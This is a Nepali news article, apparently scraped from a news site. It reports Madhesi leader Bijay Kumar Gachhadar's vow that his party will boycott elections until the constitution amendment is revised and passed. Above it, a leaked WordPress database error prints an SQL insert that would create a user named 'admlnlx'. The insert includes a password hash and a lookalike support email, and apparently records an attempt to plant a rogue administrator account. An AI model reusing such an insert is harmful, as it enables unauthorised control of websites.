WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjMYTKv82orG83.OIFtUAbqbT23AAG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 15:52:32', '', 'admlnlx', 'admlnlx')
लहान, माघ २२–
मधेसी जनअधिकार फोरम (लोकतान्त्रिक) का अध्यक्ष विजयकुमार गच्छदारले परिमार्जनसहित संविधान संशोधन प्रस्ताव पारित नभएसम्म आफ्नो पार्टीले निर्वाचनमा भाग नलिने बताउनुभएको छ ।
सिरहाको गोलबजारमा आज आयोजित अगुवा कार्यकर्ता भेलालाई सम्बोधन गर्दै अध्यक्ष गच्छदारले संविधान संशोधन प्रस्ताव परिमार्जनसहित पास नहुन्जेलसम्म निर्वाचन हुनै नसक्ने र भए पनि आफ्नो पार्टीले निर्वाचनमा भाग नलिने बताउनुभयो ।
सरकार संविधान संशोधन नगरी हावाको भरमा चुनावको घोषणा गर्न लागेको बताउँदै उहाँले यथास्थितिमा सार्थक निर्वाचन सम्भव नहुने दाबीसमेत गर्नुभयो ।
मुलुकको अवस्था अत्यन्त सङ्कटपूर्ण अवस्थामा रहेका कारण विकाससमेत अवरुद्ध भएको बताउँदै पूर्व उपप्रधानमन्त्री गच्छदारले ठूला दलका नेताहरु देशको समस्याप्रति गम्भीर हुन नसकेको आरोपसमेत लगाउनुभयो ।
संविधानसभामार्फत जनपक्षीय संविधान बनाउने जनताको चाहना अझै पनि पूरा हुन नसकेको गुनासो गर्दै उहाँले भन्नुभयो –“संविधान त बनेको छ तर, त्यो मधेसी, जनजाति, थारुलगायतलाई स्वीकार्य छैन, यसलाई आवश्यक परिमार्जनसहित संशोधन गर्नुपर्छ ।” परिमार्जनसहित संविधान संशोधन भएपछि मात्र निर्वाचनको वातावरण बन्ने उहाँको भनाइ थियो ।
कार्यक्रममा केन्द्रीय उपाध्यक्ष जितेन्द्रनारायण देव, महिला नेत्री गीतादेवी चौधरी, युवा फोरमका केन्द्रीय अध्यक्ष बेदनारायण गच्छेदारलगायतले पनि बोल्नुभएको थियो ।